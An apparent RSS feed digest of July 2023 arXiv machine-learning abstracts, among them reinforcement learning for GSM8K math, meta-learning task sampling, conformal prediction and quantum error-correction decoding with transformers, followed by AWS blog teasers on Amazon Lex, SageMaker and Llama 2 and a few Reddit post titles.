    When to solve math problems, most language models take a sampling strategy to predict next word according conditional probabilities. In the math reasoning step, it may generate wrong answer. Considering math problems are deterministic, we propose a mixed policy exploration approach to solve math problems with reinforcement learning. In peculiar, we propose a two level token exploration policy: the abstract level explores next token with probability and the second level is deterministic. Specifically, the abstract level policy will decide whether the token is operator or operand with probability sampling, while the second level is deterministic to select next token with the highest score in a greedy way. We test our method on GSM8K dataset with GPT-2 model, and demonstrate more than $2\%$ performance gain. Our implementation is available at https://github.com/vividitytech/math_lm_rl.  ( 2 min )
    Learning to Sample Tasks for Meta Learning. (arXiv:2307.08924v1 [cs.LG])
    Through experiments on various meta-learning methods, task samplers, and few-shot learning tasks, this paper arrives at three conclusions. Firstly, there are no universal task sampling strategies to guarantee the performance of meta-learning models. Secondly, task diversity can cause the models to either underfit or overfit during training. Lastly, the generalization performance of the models are influenced by task divergence, task entropy, and task difficulty. In response to these findings, we propose a novel task sampler called Adaptive Sampler (ASr). ASr is a plug-and-play task sampler that takes task divergence, task entropy, and task difficulty to sample tasks. To optimize ASr, we rethink and propose a simple and general meta-learning algorithm. Finally, a large number of empirical experiments demonstrate the effectiveness of the proposed ASr.  ( 2 min )
  • Open

    Batched Predictors Generalize within Distribution. (arXiv:2307.09379v1 [stat.ML])
    We study the generalization properties of batched predictors, i.e., models tasked with predicting the mean label of a small set (or batch) of examples. The batched prediction paradigm is particularly relevant for models deployed to determine the quality of a group of compounds in preparation for offline testing. By utilizing a suitable generalization of the Rademacher complexity, we prove that batched predictors come with exponentially stronger generalization guarantees as compared to the standard per-sample approach. Surprisingly, the proposed bound holds independently of overparametrization. Our theoretical insights are validated experimentally for various tasks, architectures, and applications.  ( 2 min )
    Optimistic Estimate Uncovers the Potential of Nonlinear Models. (arXiv:2307.08921v1 [cs.LG])
    We propose an optimistic estimate to evaluate the best possible fitting performance of nonlinear models. It yields an optimistic sample size that quantifies the smallest possible sample size to fit/recover a target function using a nonlinear model. We estimate the optimistic sample sizes for matrix factorization models, deep models, and deep neural networks (DNNs) with fully-connected or convolutional architecture. For each nonlinear model, our estimates predict a specific subset of targets that can be fitted at overparameterization, which are confirmed by our experiments. Our optimistic estimate reveals two special properties of the DNN models -- free expressiveness in width and costly expressiveness in connection. These properties suggest the following architecture design principles of DNNs: (i) feel free to add neurons/kernels; (ii) restrain from connecting neurons. Overall, our optimistic estimate theoretically unveils the vast potential of nonlinear models in fitting at overparameterization. Based on this framework, we anticipate gaining a deeper understanding of how and why numerous nonlinear models such as DNNs can effectively realize their potential in practice in the near future.  ( 2 min )
    Evaluating unsupervised disentangled representation learning for genomic discovery and disease risk prediction. (arXiv:2307.08893v1 [cs.LG])
    High-dimensional clinical data have become invaluable resources for genetic studies, due to their accessibility in biobank-scale datasets and the development of high performance modeling techniques especially using deep learning. Recent work has shown that low dimensional embeddings of these clinical data learned by variational autoencoders (VAE) can be used for genome-wide association studies and polygenic risk prediction. In this work, we consider multiple unsupervised learning methods for learning disentangled representations, namely autoencoders, VAE, beta-VAE, and FactorVAE, in the context of genetic association studies. Using spirograms from UK Biobank as a running example, we observed improvements in the number of genome-wide significant loci, heritability, and performance of polygenic risk scores for asthma and chronic obstructive pulmonary disease by using FactorVAE or beta-VAE, compared to standard VAE or non-variational autoencoders. FactorVAEs performed effectively across multiple values of the regularization hyperparameter, while beta-VAEs were much more sensitive to the hyperparameter values.  ( 2 min )
    Adaptively Optimised Adaptive Importance Samplers. (arXiv:2307.09341v1 [stat.CO])
    We introduce a new class of adaptive importance samplers leveraging adaptive optimisation tools, which we term AdaOAIS. We build on Optimised Adaptive Importance Samplers (OAIS), a class of techniques that adapt proposals to improve the mean-squared error of the importance sampling estimators by parameterising the proposal and optimising the $\chi^2$-divergence between the target and the proposal. We show that a naive implementation of OAIS using stochastic gradient descent may lead to unstable estimators despite its convergence guarantees. To remedy this shortcoming, we instead propose to use adaptive optimisers (such as AdaGrad and Adam) to improve the stability of the OAIS. We provide convergence results for AdaOAIS in a similar manner to OAIS. We also provide empirical demonstration on a variety of examples and show that AdaOAIS lead to stable importance sampling estimators in practice.  ( 2 min )
    Latent Space Representations of Neural Algorithmic Reasoners. (arXiv:2307.08874v1 [cs.LG])
    Neural Algorithmic Reasoning (NAR) is a research area focused on designing neural architectures that can reliably capture classical computation, usually by learning to execute algorithms. A typical approach is to rely on Graph Neural Network (GNN) architectures, which encode inputs in high-dimensional latent spaces that are repeatedly transformed during the execution of the algorithm. In this work we perform a detailed analysis of the structure of the latent space induced by the GNN when executing algorithms. We identify two possible failure modes: (i) loss of resolution, making it hard to distinguish similar values; (ii) inability to deal with values outside the range observed during training. We propose to solve the first issue by relying on a softmax aggregator, and propose to decay the latent space in order to deal with out-of-range values. We show that these changes lead to improvements on the majority of algorithms in the standard CLRS-30 benchmark when using the state-of-the-art Triplet-GMPNN processor. Our code is available at \href{https://github.com/mirjanic/nar-latent-spaces}{https://github.com/mirjanic/nar-latent-spaces}.
    Towards Dynamic Causal Discovery with Rare Events: A Nonparametric Conditional Independence Test. (arXiv:2211.16596v5 [stat.ML] UPDATED)
    Causal phenomena associated with rare events occur across a wide range of engineering problems, such as risk-sensitive safety analysis, accident analysis and prevention, and extreme value theory. However, current methods for causal discovery are often unable to uncover causal links, between random variables in a dynamic setting, that manifest only when the variables first experience low-probability realizations. To address this issue, we introduce a novel statistical independence test on data collected from time-invariant dynamical systems in which rare but consequential events occur. In particular, we exploit the time-invariance of the underlying data to construct a superimposed dataset of the system state before rare events happen at different timesteps. We then design a conditional independence test on the reorganized data. We provide non-asymptotic sample complexity bounds for the consistency of our method, and validate its performance across various simulated and real-world datasets, including incident data collected from the Caltrans Performance Measurement System (PeMS). Code containing the datasets and experiments is publicly available.
    PAC Neural Prediction Set Learning to Quantify the Uncertainty of Generative Language Models. (arXiv:2307.09254v1 [cs.LG])
    Uncertainty learning and quantification of models are crucial tasks to enhance the trustworthiness of the models. Importantly, the recent surge of generative language models (GLMs) emphasizes the need for reliable uncertainty quantification due to the concerns on generating hallucinated facts. In this paper, we propose to learn neural prediction set models that comes with the probably approximately correct (PAC) guarantee for quantifying the uncertainty of GLMs. Unlike existing prediction set models, which are parameterized by a scalar value, we propose to parameterize prediction sets via neural networks, which achieves more precise uncertainty quantification but still satisfies the PAC guarantee. We demonstrate the efficacy of our method on four types of language datasets and six types of models by showing that our method improves the quantified uncertainty by $63\%$ on average, compared to a standard baseline method.
    Deep Riemannian Networks for EEG Decoding. (arXiv:2212.10426v5 [cs.LG] UPDATED)
    State-of-the-art performance in electroencephalography (EEG) decoding tasks is currently often achieved with either Deep-Learning (DL) or Riemannian-Geometry-based decoders (RBDs). Recently, there is growing interest in Deep Riemannian Networks (DRNs) possibly combining the advantages of both previous classes of methods. However, there are still a range of topics where additional insight is needed to pave the way for a more widespread application of DRNs in EEG. These include architecture design questions such as network size and end-to-end ability.How these factors affect model performance has not been explored. Additionally, it is not clear how the data within these networks is transformed, and whether this would correlate with traditional EEG decoding. Our study aims to lay the groundwork in the area of these topics through the analysis of DRNs for EEG with a wide range of hyperparameters. Networks were tested on two public EEG datasets and compared with state-of-the-art ConvNets. Here we propose end-to-end EEG SPDNet (EE(G)-SPDNet), and we show that this wide, end-to-end DRN can outperform the ConvNets, and in doing so use physiologically plausible frequency regions. We also show that the end-to-end approach learns more complex filters than traditional band-pass filters targeting the classical alpha, beta, and gamma frequency bands of the EEG, and that performance can benefit from channel specific filtering approaches. Additionally, architectural analysis revealed areas for further improvement due to the possible loss of Riemannian specific information throughout the network. Our study thus shows how to design and train DRNs to infer task-related information from the raw EEG without the need of handcrafted filterbanks and highlights the potential of end-to-end DRNs such as EE(G)-SPDNet for high-performance EEG decoding.
    Nested Elimination: A Simple Algorithm for Best-Item Identification from Choice-Based Feedback. (arXiv:2307.09295v1 [cs.LG])
    We study the problem of best-item identification from choice-based feedback. In this problem, a company sequentially and adaptively shows display sets to a population of customers and collects their choices. The objective is to identify the most preferred item with the least number of samples and at a high confidence level. We propose an elimination-based algorithm, namely Nested Elimination (NE), which is inspired by the nested structure implied by the information-theoretic lower bound. NE is simple in structure, easy to implement, and has a strong theoretical guarantee for sample complexity. Specifically, NE utilizes an innovative elimination criterion and circumvents the need to solve any complex combinatorial optimization problem. We provide an instance-specific and non-asymptotic bound on the expected sample complexity of NE. We also show NE achieves high-order worst-case asymptotic optimality. Finally, numerical experiments from both synthetic and real data corroborate our theoretical findings.
    Estimation of an Order Book Dependent Hawkes Process for Large Datasets. (arXiv:2307.09077v1 [q-fin.TR])
    A point process for event arrivals in high frequency trading is presented. The intensity is the product of a Hawkes process and high dimensional functions of covariates derived from the order book. Conditions for stationarity of the process are stated. An algorithm is presented to estimate the model even in the presence of billions of data points, possibly mapping covariates into a high dimensional space. The large sample size can be common for high frequency data applications using multiple liquid instruments. Convergence of the algorithm is shown, consistency results under weak conditions is established, and a test statistic to assess out of sample performance of different model specifications is suggested. The methodology is applied to the study of four stocks that trade on the New York Stock Exchange (NYSE). The out of sample testing procedure suggests that capturing the nonlinearity of the order book information adds value to the self exciting nature of high frequency trading events.
    A Covariate-Adjusted Homogeneity Test with Application to Facial Recognition Accuracy Assessment. (arXiv:2307.08846v1 [stat.AP])
    Ordinal scores occur commonly in medical imaging studies and in black-box forensic studies \citep{Phillips:2018}. To assess the accuracy of raters in the studies, one needs to estimate the receiver operating characteristic (ROC) curve while accounting for covariates of raters. In this paper, we propose a covariate-adjusted homogeneity test to determine differences in accuracy among multiple rater groups. We derived the theoretical results of the proposed test and conducted extensive simulation studies to evaluate the finite sample performance of the proposed test. Our proposed test is applied to a face recognition study to identify statistically significant differences among five participant groups.
    Globally solving the Gromov-Wasserstein problem for point clouds in low dimensional Euclidean spaces. (arXiv:2307.09057v1 [math.OC])
    This paper presents a framework for computing the Gromov-Wasserstein problem between two sets of points in low dimensional spaces, where the discrepancy is the squared Euclidean norm. The Gromov-Wasserstein problem is a generalization of the optimal transport problem that finds the assignment between two sets preserving pairwise distances as much as possible. This can be used to quantify the similarity between two formations or shapes, a common problem in AI and machine learning. The problem can be formulated as a Quadratic Assignment Problem (QAP), which is in general computationally intractable even for small problems. Our framework addresses this challenge by reformulating the QAP as an optimization problem with a low-dimensional domain, leveraging the fact that the problem can be expressed as a concave quadratic optimization problem with low rank. The method scales well with the number of points, and it can be used to find the global solution for large-scale problems with thousands of points. We compare the computational complexity of our approach with state-of-the-art methods on synthetic problems and apply it to a near-symmetrical problem which is of particular interest in computational biology.
    Martian time-series unraveled: A multi-scale nested approach with factorial variational autoencoders. (arXiv:2305.16189v2 [cs.LG] UPDATED)
    Unsupervised source separation involves unraveling an unknown set of source signals recorded through a mixing operator, with limited prior knowledge about the sources, and only access to a dataset of signal mixtures. This problem is inherently ill-posed and is further challenged by the variety of time-scales exhibited by sources in time series data. Existing methods typically rely on a preselected window size that limits their capacity to handle multi-scale sources. To address this issue, instead of operating in the time domain, we propose an unsupervised multi-scale clustering and source separation framework by leveraging wavelet scattering covariances that provide a low-dimensional representation of stochastic processes, capable of distinguishing between different non-Gaussian stochastic processes. Nested within this representation space, we develop a factorial Gaussian-mixture variational autoencoder that is trained to (1) probabilistically cluster sources at different time-scales and (2) independently sample scattering covariance representations associated with each cluster. Using samples from each cluster as prior information, we formulate source separation as an optimization problem in the wavelet scattering covariance representation space, resulting in separated sources in the time domain. When applied to seismic data recorded during the NASA InSight mission on Mars, our multi-scale nested approach proves to be a powerful tool for discriminating between sources varying greatly in time-scale, e.g., minute-long transient one-sided pulses (known as ``glitches'') and structured ambient noises resulting from atmospheric activities that typically last for tens of minutes. These results provide an opportunity to conduct further investigations into the isolated sources related to atmospheric-surface interactions, thermal relaxations, and other complex phenomena.
    Conditionally Calibrated Predictive Distributions by Probability-Probability Map: Application to Galaxy Redshift Estimation and Probabilistic Forecasting. (arXiv:2205.14568v4 [stat.ML] UPDATED)
    Uncertainty quantification is crucial for assessing the predictive ability of AI algorithms. Much research has been devoted to describing the predictive distribution (PD) $F(y|\mathbf{x})$ of a target variable $y \in \mathbb{R}$ given complex input features $\mathbf{x} \in \mathcal{X}$. However, off-the-shelf PDs (from, e.g., normalizing flows and Bayesian neural networks) often lack conditional calibration with the probability of occurrence of an event given input $\mathbf{x}$ being significantly different from the predicted probability. Current calibration methods do not fully assess and enforce conditionally calibrated PDs. Here we propose \texttt{Cal-PIT}, a method that addresses both PD diagnostics and recalibration by learning a single probability-probability map from calibration data. The key idea is to regress probability integral transform scores against $\mathbf{x}$. The estimated regression provides interpretable diagnostics of conditional coverage across the feature space. The same regression function morphs the misspecified PD to a re-calibrated PD for all $\mathbf{x}$. We benchmark our corrected prediction bands (a by-product of corrected PDs) against oracle bands and state-of-the-art predictive inference algorithms for synthetic data. We also provide results for two applications: (i) probabilistic nowcasting given sequences of satellite images, and (ii) conditional density estimation of galaxy distances given imaging data (so-called photometric redshift estimation). Our code is available as a Python package https://github.com/lee-group-cmu/Cal-PIT .
    Robust Counterfactual Explanations for Neural Networks With Probabilistic Guarantees. (arXiv:2305.11997v2 [stat.ML] UPDATED)
    There is an emerging interest in generating robust counterfactual explanations that would remain valid if the model is updated or changed even slightly. Towards finding robust counterfactuals, existing literature often assumes that the original model $m$ and the new model $M$ are bounded in the parameter space, i.e., $\|\text{Params}(M){-}\text{Params}(m)\|{<}\Delta$. However, models can often change significantly in the parameter space with little to no change in their predictions or accuracy on the given dataset. In this work, we introduce a mathematical abstraction termed \emph{naturally-occurring} model change, which allows for arbitrary changes in the parameter space such that the change in predictions on points that lie on the data manifold is limited. Next, we propose a measure -- that we call \emph{Stability} -- to quantify the robustness of counterfactuals to potential model changes for differentiable models, e.g., neural networks. Our main contribution is to show that counterfactuals with sufficiently high value of \emph{Stability} as defined by our measure will remain valid after potential ``naturally-occurring'' model changes with high probability (leveraging concentration bounds for Lipschitz function of independent Gaussians). Since our quantification depends on the local Lipschitz constant around a data point which is not always available, we also examine practical relaxations of our proposed measure and demonstrate experimentally how they can be incorporated to find robust counterfactuals for neural networks that are close, realistic, and remain valid after potential model changes. This work also has interesting connections with model multiplicity, also known as, the Rashomon effect.
    Sparse Gaussian Graphical Models with Discrete Optimization: Computational and Statistical Perspectives. (arXiv:2307.09366v1 [cs.LG])
    We consider the problem of learning a sparse graph underlying an undirected Gaussian graphical model, a key problem in statistical machine learning. Given $n$ samples from a multivariate Gaussian distribution with $p$ variables, the goal is to estimate the $p \times p$ inverse covariance matrix (aka precision matrix), assuming it is sparse (i.e., has a few nonzero entries). We propose GraphL0BnB, a new estimator based on an $\ell_0$-penalized version of the pseudolikelihood function, while most earlier approaches are based on the $\ell_1$-relaxation. Our estimator can be formulated as a convex mixed integer program (MIP) which can be difficult to compute at scale using off-the-shelf commercial solvers. To solve the MIP, we propose a custom nonlinear branch-and-bound (BnB) framework that solves node relaxations with tailored first-order methods. As a by-product of our BnB framework, we propose large-scale solvers for obtaining good primal solutions that are of independent interest. We derive novel statistical guarantees (estimation and variable selection) for our estimator and discuss how our approach improves upon existing estimators. Our numerical experiments on real/synthetic datasets suggest that our method can solve, to near-optimality, problem instances with $p = 10^4$ -- corresponding to a symmetric matrix of size $p \times p$ with $p^2/2$ binary variables. We demonstrate the usefulness of GraphL0BnB versus various state-of-the-art approaches on a range of datasets.
    The Score-Difference Flow for Implicit Generative Modeling. (arXiv:2304.12906v2 [cs.LG] UPDATED)
    Implicit generative modeling (IGM) aims to produce samples of synthetic data matching the characteristics of a target data distribution. Recent work (e.g. score-matching networks, diffusion models) has approached the IGM problem from the perspective of pushing synthetic source data toward the target distribution via dynamical perturbations or flows in the ambient space. In this direction, we present the score difference (SD) between arbitrary target and source distributions as a flow that optimally reduces the Kullback-Leibler divergence between them while also solving the Schroedinger bridge problem. We apply the SD flow to convenient proxy distributions, which are aligned if and only if the original distributions are aligned. We demonstrate the formal equivalence of this formulation to denoising diffusion models under certain conditions. We also show that the training of generative adversarial networks includes a hidden data-optimization sub-problem, which induces the SD flow under certain choices of loss function when the discriminator is optimal. As a result, the SD flow provides a theoretical link between model classes that individually address the three challenges of the "generative modeling trilemma" -- high sample quality, mode coverage, and fast sampling -- thereby setting the stage for a unified approach.
    Non-stationary Delayed Combinatorial Semi-Bandit with Causally Related Rewards. (arXiv:2307.09093v1 [cs.LG])
    Sequential decision-making under uncertainty is often associated with long feedback delays. Such delays degrade the performance of the learning agent in identifying a subset of arms with the optimal collective reward in the long run. This problem becomes significantly challenging in a non-stationary environment with structural dependencies amongst the reward distributions associated with the arms. Therefore, besides adapting to delays and environmental changes, learning the causal relations alleviates the adverse effects of feedback delay on the decision-making process. We formalize the described setting as a non-stationary and delayed combinatorial semi-bandit problem with causally related rewards. We model the causal relations by a directed graph in a stationary structural equation model. The agent maximizes the long-term average payoff, defined as a linear function of the base arms' rewards. We develop a policy that learns the structural dependencies from delayed feedback and utilizes that to optimize the decision-making while adapting to drifts. We prove a regret bound for the performance of the proposed algorithm. Besides, we evaluate our method via numerical analysis using synthetic and real-world datasets to detect the regions that contribute the most to the spread of Covid-19 in Italy.
    Multi-Objective GFlowNets. (arXiv:2210.12765v2 [cs.LG] UPDATED)
    We study the problem of generating diverse candidates in the context of Multi-Objective Optimization. In many applications of machine learning such as drug discovery and material design, the goal is to generate candidates which simultaneously optimize a set of potentially conflicting objectives. Moreover, these objectives are often imperfect evaluations of some underlying property of interest, making it important to generate diverse candidates to have multiple options for expensive downstream evaluations. We propose Multi-Objective GFlowNets (MOGFNs), a novel method for generating diverse Pareto optimal solutions, based on GFlowNets. We introduce two variants of MOGFNs: MOGFN-PC, which models a family of independent sub-problems defined by a scalarization function, with reward-conditional GFlowNets, and MOGFN-AL, which solves a sequence of sub-problems defined by an acquisition function in an active learning loop. Our experiments on wide variety of synthetic and benchmark tasks demonstrate advantages of the proposed methods in terms of the Pareto performance and importantly, improved candidate diversity, which is the main contribution of this work.
    Outlier-Robust Tensor Low-Rank Representation for Data Clustering. (arXiv:2307.09055v1 [stat.ML])
    Low-rank tensor analysis has received widespread attention with many practical applications. However, the tensor data are often contaminated by outliers or sample-specific corruptions. How to recover the tensor data that are corrupted by outliers and perform data clustering remains a challenging problem. This paper develops an outlier-robust tensor low-rank representation (OR-TLRR) method for simultaneous outlier detection and tensor data clustering based on the tensor singular value decomposition (t-SVD) algebraic framework. It is motivated by the recently proposed tensor-tensor product induced by invertible linear transforms that satisfy certain conditions. For tensor observations with arbitrary outlier corruptions, OR-TLRR has provable performance guarantee for exactly recovering the row space of clean data and detecting outliers under mild conditions. Moreover, an extension of OR-TLRR is also proposed to handle the case when parts of the data are missing. Finally, extensive experimental results on both synthetic and real data demonstrate the effectiveness of the proposed algorithms.
    qecGPT: decoding Quantum Error-correcting Codes with Generative Pre-trained Transformers. (arXiv:2307.09025v1 [quant-ph])
    We propose a general framework for decoding quantum error-correcting codes with generative modeling. The model utilizes autoregressive neural networks, specifically Transformers, to learn the joint probability of logical operators and syndromes. This training is in an unsupervised way, without the need for labeled training data, and is thus referred to as pre-training. After the pre-training, the model can efficiently compute the likelihood of logical operators for any given syndrome, using maximum likelihood decoding. It can directly generate the most-likely logical operators with computational complexity $\mathcal O(2k)$ in the number of logical qubits $k$, which is significantly better than the conventional maximum likelihood decoding algorithms that require $\mathcal O(4^k)$ computation. Based on the pre-trained model, we further propose refinement to achieve more accurately the likelihood of logical operators for a given syndrome by directly sampling the stabilizer operators. We perform numerical experiments on stabilizer codes with small code distances, using both depolarizing error models and error models with correlated noise. The results show that our approach provides significantly better decoding accuracy than the minimum weight perfect matching and belief-propagation-based algorithms. Our framework is general and can be applied to any error model and quantum codes with different topologies such as surface codes and quantum LDPC codes. Furthermore, it leverages the parallelization capabilities of GPUs, enabling simultaneous decoding of a large number of syndromes. Our approach sheds light on the efficient and accurate decoding of quantum error-correcting codes using generative artificial intelligence and modern computational power.
    Unsupervised Embedding Quality Evaluation. (arXiv:2305.16562v2 [cs.LG] UPDATED)
    Unsupervised learning has recently significantly gained in popularity, especially with deep learning-based approaches. Despite numerous successes and approaching supervised-level performance on a variety of academic benchmarks, it is still hard to train and evaluate SSL models in practice due to the unsupervised nature of the problem. Even with networks trained in a supervised fashion, it is often unclear whether they will perform well when transferred to another domain. Past works are generally limited to assessing the amount of information contained in embeddings, which is most relevant for self-supervised learning of deep neural networks. This works chooses to follow a different approach: can we quantify how easy it is to linearly separate the data in a stable way? We survey the literature and uncover three methods that could be potentially used for evaluating quality of representations. We also introduce one novel method based on recent advances in understanding the high-dimensional geometric structure of self-supervised learning. We conduct extensive experiments and study the properties of these metrics and ones introduced in the previous work. Our results suggest that while there is no free lunch, there are metrics that can robustly estimate embedding quality in an unsupervised way.
    Limitations of Information-Theoretic Generalization Bounds for Gradient Descent Methods in Stochastic Convex Optimization. (arXiv:2212.13556v3 [cs.LG] UPDATED)
    To date, no "information-theoretic" frameworks for reasoning about generalization error have been shown to establish minimax rates for gradient descent in the setting of stochastic convex optimization. In this work, we consider the prospect of establishing such rates via several existing information-theoretic frameworks: input-output mutual information bounds, conditional mutual information bounds and variants, PAC-Bayes bounds, and recent conditional variants thereof. We prove that none of these bounds are able to establish minimax rates. We then consider a common tactic employed in studying gradient methods, whereby the final iterate is corrupted by Gaussian noise, producing a noisy "surrogate" algorithm. We prove that minimax rates cannot be established via the analysis of such surrogates. Our results suggest that new ideas are required to analyze gradient descent using information-theoretic techniques.
    Conformal Prediction Bands for Two-Dimensional Functional Time Series. (arXiv:2207.13656v2 [stat.ME] UPDATED)
    Time evolving surfaces can be modeled as two-dimensional Functional time series, exploiting the tools of Functional data analysis. Leveraging this approach, a forecasting framework for such complex data is developed. The main focus revolves around Conformal Prediction, a versatile nonparametric paradigm used to quantify uncertainty in prediction problems. Building upon recent variations of Conformal Prediction for Functional time series, a probabilistic forecasting scheme for two-dimensional functional time series is presented, while providing an extension of Functional Autoregressive Processes of order one to this setting. Estimation techniques for the latter process are introduced and their performance are compared in terms of the resulting prediction regions. Finally, the proposed forecasting procedure and the uncertainty quantification technique are applied to a real dataset, collecting daily observations of Sea Level Anomalies of the Black Sea
    Scaling Laws for Imitation Learning in NetHack. (arXiv:2307.09423v1 [cs.LG])
    Imitation Learning (IL) is one of the most widely used methods in machine learning. Yet, while powerful, many works find it is often not able to fully recover the underlying expert behavior. However, none of these works deeply investigate the role of scaling up the model and data size. Inspired by recent work in Natural Language Processing (NLP) where "scaling up" has resulted in increasingly more capable LLMs, we investigate whether carefully scaling up model and data size can bring similar improvements in the imitation learning setting. To demonstrate our findings, we focus on the game of NetHack, a challenging environment featuring procedural generation, stochasticity, long-term dependencies, and partial observability. We find IL loss and mean return scale smoothly with the compute budget and are strongly correlated, resulting in power laws for training compute-optimal IL agents with respect to model size and number of samples. We forecast and train several NetHack agents with IL and find they outperform prior state-of-the-art by at least 2x in all settings. Our work both demonstrates the scaling behavior of imitation learning in a challenging domain, as well as the viability of scaling up current approaches for increasingly capable agents in NetHack, a game that remains elusively hard for current AI systems.
    Best-of-three-worlds Analysis for Linear Bandits with Follow-the-regularized-leader Algorithm. (arXiv:2303.06825v2 [cs.LG] UPDATED)
    The linear bandit problem has been studied for many years in both stochastic and adversarial settings. Designing an algorithm that can optimize the environment without knowing the loss type attracts lots of interest. \citet{LeeLWZ021} propose an algorithm that actively detects the loss type and then switches between different algorithms specially designed for specific settings. However, such an approach requires meticulous designs to perform well in all environments. Follow-the-regularized-leader (FTRL) is another type of popular algorithm that can adapt to different environments. This algorithm is of simple design and the regret bounds are shown to be optimal in traditional multi-armed bandit problems compared with the detect-switch type. Designing an FTRL-type algorithm for linear bandits is an important question that has been open for a long time. In this paper, we prove that the FTRL algorithm with a negative entropy regularizer can achieve the best-of-three-world results for the linear bandit problem. Our regret bounds achieve the same or nearly the same order as the previous detect-switch type algorithm but with a much simpler algorithmic design.
    Oracle Efficient Online Multicalibration and Omniprediction. (arXiv:2307.08999v1 [cs.LG])
    A recent line of work has shown a surprising connection between multicalibration, a multi-group fairness notion, and omniprediction, a learning paradigm that provides simultaneous loss minimization guarantees for a large family of loss functions. Prior work studies omniprediction in the batch setting. We initiate the study of omniprediction in the online adversarial setting. Although there exist algorithms for obtaining notions of multicalibration in the online adversarial setting, unlike batch algorithms, they work only for small finite classes of benchmark functions $F$, because they require enumerating every function $f \in F$ at every round. In contrast, omniprediction is most interesting for learning theoretic hypothesis classes $F$, which are generally continuously large. We develop a new online multicalibration algorithm that is well defined for infinite benchmark classes $F$, and is oracle efficient (i.e. for any class $F$, the algorithm has the form of an efficient reduction to a no-regret learning algorithm for $F$). The result is the first efficient online omnipredictor -- an oracle efficient prediction algorithm that can be used to simultaneously obtain no regret guarantees to all Lipschitz convex loss functions. For the class $F$ of linear functions, we show how to make our algorithm efficient in the worst case. Also, we show upper and lower bounds on the extent to which our rates can be improved: our oracle efficient algorithm actually promises a stronger guarantee called swap-omniprediction, and we prove a lower bound showing that obtaining $O(\sqrt{T})$ bounds for swap-omniprediction is impossible in the online setting. On the other hand, we give a (non-oracle efficient) algorithm which can obtain the optimal $O(\sqrt{T})$ omniprediction bounds without going through multicalibration, giving an information theoretic separation between these two solution concepts.
    Scalable Coupling of Deep Learning with Logical Reasoning. (arXiv:2305.07617v2 [cs.AI] UPDATED)
    In the ongoing quest for hybridizing discrete reasoning with neural nets, there is an increasing interest in neural architectures that can learn how to solve discrete reasoning or optimization problems from natural inputs. In this paper, we introduce a scalable neural architecture and loss function dedicated to learning the constraints and criteria of NP-hard reasoning problems expressed as discrete Graphical Models. Our loss function solves one of the main limitations of Besag's pseudo-loglikelihood, enabling learning of high energies. We empirically show it is able to efficiently learn how to solve NP-hard reasoning problems from natural inputs as the symbolic, visual or many-solutions Sudoku problems as well as the energy optimization formulation of the protein design problem, providing data efficiency, interpretability, and \textit{a posteriori} control over predictions.
    Resource frugal optimizer for quantum machine learning. (arXiv:2211.04965v2 [quant-ph] UPDATED)
    Quantum-enhanced data science, also known as quantum machine learning (QML), is of growing interest as an application of near-term quantum computers. Variational QML algorithms have the potential to solve practical problems on real hardware, particularly when involving quantum data. However, training these algorithms can be challenging and calls for tailored optimization procedures. Specifically, QML applications can require a large shot-count overhead due to the large datasets involved. In this work, we advocate for simultaneous random sampling over both the dataset as well as the measurement operators that define the loss function. We consider a highly general loss function that encompasses many QML applications, and we show how to construct an unbiased estimator of its gradient. This allows us to propose a shot-frugal gradient descent optimizer called Refoqus (REsource Frugal Optimizer for QUantum Stochastic gradient descent). Our numerics indicate that Refoqus can save several orders of magnitude in shot cost, even relative to optimizers that sample over measurement operators alone.
    Conformal prediction under ambiguous ground truth. (arXiv:2307.09302v1 [cs.LG])
    In safety-critical classification tasks, conformal prediction allows to perform rigorous uncertainty quantification by providing confidence sets including the true class with a user-specified probability. This generally assumes the availability of a held-out calibration set with access to ground truth labels. Unfortunately, in many domains, such labels are difficult to obtain and usually approximated by aggregating expert opinions. In fact, this holds true for almost all datasets, including well-known ones such as CIFAR and ImageNet. Applying conformal prediction using such labels underestimates uncertainty. Indeed, when expert opinions are not resolvable, there is inherent ambiguity present in the labels. That is, we do not have ``crisp'', definitive ground truth labels and this uncertainty should be taken into account during calibration. In this paper, we develop a conformal prediction framework for such ambiguous ground truth settings which relies on an approximation of the underlying posterior distribution of labels given inputs. We demonstrate our methodology on synthetic and real datasets, including a case study of skin condition classification in dermatology.
    Nested stochastic block model for simultaneously clustering networks and nodes. (arXiv:2307.09210v1 [stat.ME])
    We introduce the nested stochastic block model (NSBM) to cluster a collection of networks while simultaneously detecting communities within each network. NSBM has several appealing features including the ability to work on unlabeled networks with potentially different node sets, the flexibility to model heterogeneous communities, and the means to automatically select the number of classes for the networks and the number of communities within each network. This is accomplished via a Bayesian model, with a novel application of the nested Dirichlet process (NDP) as a prior to jointly model the between-network and within-network clusters. The dependency introduced by the network data creates nontrivial challenges for the NDP, especially in the development of efficient samplers. For posterior inference, we propose several Markov chain Monte Carlo algorithms including a standard Gibbs sampler, a collapsed Gibbs sampler, and two blocked Gibbs samplers that ultimately return two levels of clustering labels from both within and across the networks. Extensive simulation studies are carried out which demonstrate that the model provides very accurate estimates of both levels of the clustering structure. We also apply our model to two social network datasets that cannot be analyzed using any previous method in the literature due to the anonymity of the nodes and the varying number of nodes in each network.

  • Open

    Enhance Amazon Lex with conversational FAQ features using LLMs
    Amazon Lex is a service that allows you to quickly and easily build conversational bots (“chatbots”), virtual agents, and interactive voice response (IVR) systems for applications such as Amazon Connect. Artificial intelligence (AI) and machine learning (ML) have been a focus for Amazon for over 20 years, and many of the capabilities that customers use […]  ( 10 min )
    Enhance Amazon Lex with LLMs and improve the FAQ experience using URL ingestion
    In today’s digital world, most consumers would rather find answers to their customer service questions on their own rather than taking the time to reach out to businesses and/or service providers. This blog post explores an innovative solution to build a question and answer chatbot in Amazon Lex that uses existing FAQs from your website. […]  ( 9 min )
    Build an email spam detector using Amazon SageMaker
    Spam emails, also known as junk mail, are sent to a large number of users at once and often contain scams, phishing content, or cryptic messages. Spam emails are sometimes sent manually by a human, but most often they are sent using a bot. Examples of spam emails include fake ads, chain emails, and impersonation […]  ( 6 min )
    Llama 2 foundation models from Meta are now available in Amazon SageMaker JumpStart
    Today, we are excited to announce that Llama 2 foundation models developed by Meta are available for customers through Amazon SageMaker JumpStart. The Llama 2 family of large language models (LLMs) is a collection of pre-trained and fine-tuned generative text models ranging in scale from 7 billion to 70 billion parameters. Fine-tuned LLMs, called Llama-2-chat, […]  ( 14 min )
  • Open

    [R] Adversarial Robust Deep Reinforcement Learning Requires Redefining Robustness
    https://ojs.aaai.org/index.php/AAAI/article/view/26009/25781 submitted by /u/ml_dnn [link] [comments]  ( 8 min )
    [P] We made Llama13b-v2-chat immediately available as an endpoint for developers
